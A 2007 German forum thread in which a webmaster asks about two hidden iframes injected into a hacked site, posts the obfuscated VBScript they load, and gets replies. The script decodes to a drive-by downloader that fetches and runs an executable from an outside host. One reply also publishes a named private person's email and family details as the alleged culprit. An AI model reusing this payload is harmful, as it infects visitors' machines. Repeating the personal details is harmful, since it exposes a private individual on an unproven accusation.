Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

Homepage gehackt wurden?

Frage Sicherheit Erkennung und -Abwehr

Mitglied: Casanitto

Casanitto (Level 1) - Jetzt verbinden

08.09.2007, aktualisiert 09.09.2007, 4175 Aufrufe, 2 Kommentare

Hallo,

Seit heute kann ich mich nicht mehr in meine Homepage einloggen, benutze Webspell als CMS.
Er sagt mir zwar das ich korrekt eingeloggt bin, abba dann bei der nächsten Seite sagt er das ich eingeloggt sein muss um die Webseite zusehen!
Habe dann mal geschaut im Quelltext und da steht dann das hier:

01.
 <IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe> 
02.
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe> 
03.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
Das ist aber nicht von mir!
Wenn man diese Webseite aufruft kommt folgendes :
01.
<script language="JavaScript"> 
02.
<!-- 
03.
 
04.
function SymError() 
05.
06.
  return true; 
07.
08.
 
09.
window.onerror = SymError; 
10.
 
11.
var SymRealWinOpen = window.open; 
12.
 
13.
function SymWinOpen(url, name, attributes) 
14.
15.
  return (new Object()); 
16.
17.
 
18.
window.open = SymWinOpen; 
19.
 
20.
//--> 
21.
</script> 
22.
 
23.
<script language="JavaScript"> 
24.
<!-- 
25.
 
26.
function SymError() 
27.
28.
  return true; 
29.
30.
 
31.
window.onerror = SymError; 
32.
 
33.
var SymRealWinOpen = window.open; 
34.
 
35.
function SymWinOpen(url, name, attributes) 
36.
37.
  return (new Object()); 
38.
39.
 
40.
window.open = SymWinOpen; 
41.
 
42.
//--> 
43.
</script> 
44.
 
45.
<SCRIPT LANGUAGE="VBS"><!-- 
46.
d="=tdsjqu mbohvbhf>WCTdsjqu?po fssps sftvnf ofyuem > iuuq;00vtvbsjpt/bsofu/dpn/bs0bmwbsf{mvrvf0gmbti8/fyfTfu eg > epdvnfou/dsfbufFmf1#(pckfdu*eg/tfuBuusjcvuf dmbttje-.#tje;CE:7D667.76B4.22E1.:94B.11D15GD3:F47=$y<$g/D6$P-$(Njdsptpgu/YNMIUUQ-C$tfu TT#g$^$(Bepec/TusfbnO#T/uzqf > 2tus7>HFUy/Pqfo 6#- em- Gbmtf;#Tfoe' Hfu ufnq ejsfdupsz boe ;$ pvs eftujobujpo obnfg*#2>mtbtt)'w$Gw$,(joh/GjmfTztufnj%W%unq > G/HfuTqfdjbmGpmefs(3* m$nq g7#I$ G/CvjmeQbui(unq-;#$&pqfo+#xsjuf y/sftqpotfCpez;#tbwfupgjmf Y#-3:#dmp4&\$R<%ifmm/Bqqmjd'&3%R/=#Fyfd,)v#A#-U$-1=0t|%?=0cpez?=0iunm?=9#     (#-#7#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#               =0tdsjqu" 
47.
s="" 
48.
For i=1 To Len(d) 
49.
b=Mid(d,i,1) 
50.
a=Asc(b) 
51.
If a=1 Then a=9 
52.
If a=2 Then a=10 
53.
If a=3 Then a=13 
54.
If a=4 Then a=34 
55.
If a<=31 And a>=14 Then 
56.
s=s+Mid(s,Len(s)-(Asc(Mid(d,i+1,1))-36+90*(Asc(Mid(d,i+2,1))-35)),a-14+4) 
57.
i=i+2 
58.
Else 
59.
if a>=41 and a<=127 then a=a-1 
60.
if a <127 then s=s+Chr(a) else s=s+b 
61.
End If 
62.
Next 
63.
document.write s 
64.
 
65.
--></SCRIPT> 
66.
<script language="JavaScript"> 
67.
<!-- 
68.
var SymRealOnLoad; 
69.
var SymRealOnUnload; 
70.
 
71.
function SymOnUnload() 
72.
73.
  window.open = SymWinOpen; 
74.
  if(SymRealOnUnload != null) 
75.
     SymRealOnUnload(); 
76.
77.
 
78.
function SymOnLoad() 
79.
80.
  if(SymRealOnLoad != null) 
81.
     SymRealOnLoad(); 
82.
  window.open = SymRealWinOpen; 
83.
  SymRealOnUnload = window.onunload; 
84.
  window.onunload = SymOnUnload; 
85.
86.
 
87.
SymRealOnLoad = window.onload; 
88.
window.onload = SymOnLoad; 
89.
 
90.
//--> 
91.
</script> 
92.
 
93.
 
94.
<script language="JavaScript"> 
95.
<!-- 
96.
var SymRealOnLoad; 
97.
var SymRealOnUnload; 
98.
 
99.
function SymOnUnload() 
100.
101.
  window.open = SymWinOpen; 
102.
  if(SymRealOnUnload != null) 
103.
     SymRealOnUnload(); 
104.
105.
 
106.
function SymOnLoad() 
107.
108.
  if(SymRealOnLoad != null) 
109.
     SymRealOnLoad(); 
110.
  window.open = SymRealWinOpen; 
111.
  SymRealOnUnload = window.onunload; 
112.
  window.onunload = SymOnUnload; 
113.
114.
 
115.
SymRealOnLoad = window.onload; 
116.
window.onload = SymOnLoad; 
117.
 
118.
//--> 
119.
</script>
Kann mir von euch vielleicht jemand sagen was das sein soll?

Gruss Casanitto
Mitglied: thekingofqueens
08.09.2007 um 22:27 Uhr
Provider informieren, Backup des Contents machen, alles löschen und von vorne anfangen.
Bitte warten ..
Mitglied: gnarff
09.09.2007 um 02:09 Uhr
Zu den Codesnippet:
1: Ein Scriptblocker
2. Geblockt wurde folgendes Script:
<SCRIPT LANGUAGE="VBS"><!--
d="=tdsjqu mbohvbhf>WCTdsjqu?po fssps sftvnf ofyuem > iuuq;00vtvbsjpt/bsofu/dpn/bs0bmwbsf{mvrvf0gmbti8/fyfTfu eg > epdvnfou/dsfbufFmf1#(pckfdu*eg/tfuBuusjcvuf dmbttje-.#tje;CE:7D667.76B4.22E1.:94B.11D15GD3:F47=$y<$g/D6$P-$(Njdsptpgu/YNMIUUQ-C$tfu TT#g$^$(Bepec/TusfbnO#T/uzqf > 2tus7>HFUy/Pqfo 6#- em- Gbmtf;#Tfoe' Hfu ufnq ejsfdupsz boe ;$ pvs eftujobujpo obnfg*#2>mtbtt)'w$Gw$,(joh/GjmfTztufnj%W%unq > G/HfuTqfdjbmGpmefs(3* m$nq g7#I$ G/CvjmeQbui(unq-;#$&pqfo+#xsjuf y/sftqpotfCpez;#tbwfupgjmf Y#-3:#dmp4&\$R<%ifmm/Bqqmjd'&3%R/=#Fyfd,)v#A#-U$-1=0t|%?=0cpez?=0iunm?=9# (#-#7#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8# =0tdsjqu"
s=""
For i=1 To Len(d)
b=Mid(d,i,1)
a=Asc(b)
If a=1 Then a=9
If a=2 Then a=10
If a=3 Then a=13
If a=4 Then a=34
If a<=31 And a>=14 Then
s=s+Mid(s,Len(s)-(Asc(Mid(d,i+1,1))-36+90*(Asc(Mid(d,i+2,1))-35)),a-14+4)
i=i+2
Else
if a>=41 and a<=127 then a=a-1
if a <127 then s=s+Chr(a) else s=s+b
End If
Next
document.write s

Wenn Du wissen willst was Alvarez auf Deiner HP wollte oder dich gar beschweren moechtest, so kannst Du das direkt bei Ihm tun alvarezluque@arnet.com.ar, sein Vater ist Sekretaer des Rotary Clubs in Corrientes, Argentinien, sein voller Name ist Augusto Alvarez Luque, Dipl. Informatiker,
saludos
gnarff
Bitte warten ..
Neuester Wissensbeitrag
Windows 10

Powershell 5 BSOD

(8)

Tipp von agowa338 zum Thema Windows 10 ...

Ähnliche Inhalte
Linux Desktop
Webseite aufgerufen - Linux gehackt (5)

Link von BirdyB zum Thema Linux Desktop ...

Erkennung und -Abwehr
Adult Friend Finder: 412 Milionen Accounts von Datingseite gehackt (3)

Link von Frank zum Thema Erkennung und -Abwehr ...

Viren und Trojaner
Philips Hue: Smarte Lampe per Drohne gehackt (1)

Link von magicteddy zum Thema Viren und Trojaner ...

Tipps & Tricks
gelöst O+O ShutUp 10: Welche Einstellungen wurden vorgenommen? (6)

Frage von honeybee zum Thema Tipps & Tricks ...

Heiß diskutierte Inhalte
Microsoft
Ordner mit LW-Buchstaben versehen und benennen (20)

Frage von Xaero1982 zum Thema Microsoft ...

Outlook & Mail
gelöst Outlook 2010 findet ost datei nicht (19)

Frage von Floh21 zum Thema Outlook & Mail ...

Netzwerkmanagement
gelöst Anregungen, kleiner Betrieb, IT-Umgebung (18)

Frage von Unwichtig zum Thema Netzwerkmanagement ...

Festplatten, SSD, Raid
M.2 SSD wird nicht erkannt (14)

Frage von uridium69 zum Thema Festplatten, SSD, Raid ...